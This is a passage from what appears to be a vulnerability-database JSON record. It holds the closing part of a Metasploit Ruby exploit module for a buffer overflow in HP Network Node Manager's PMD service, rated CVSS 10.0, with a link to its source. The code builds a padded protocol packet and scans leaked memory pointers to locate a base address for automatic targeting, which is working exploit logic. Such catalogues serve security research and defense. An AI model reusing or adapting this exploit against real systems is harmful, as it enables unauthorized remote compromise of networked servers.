proto_tbl_pkt\n hdr = [0x2aa].pack(\"V\") # proto_tbl packet\n data = \"\\x00\" * (0xfa4 - hdr.length)\n\n hdr + data\n end\n\n def base(address, offset)\n address - offset\n end\n\n def find_ov_base(t, data)\n print_status(\"Searching #{t.name} pointers...\")\n i = 0\n data.unpack(\"V*\").each do |int|\n if base(int, t['ov_offset']) % 0x1000 == 0\n print_status(\"Pointer 0x#{int.to_s(16)} found at offset #{i * 4}\")\n @ov_base = base(int, t['ov_offset'])\n return true\n end\n i = i + 1\n end\n\n false\n end\n\n def auto_target(data)\n targets.each do |t|\n next if t.name == 'Automatic'\n if find_ov_base(t, data)\n return t\n end\n end\n\n nil\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb"}]}
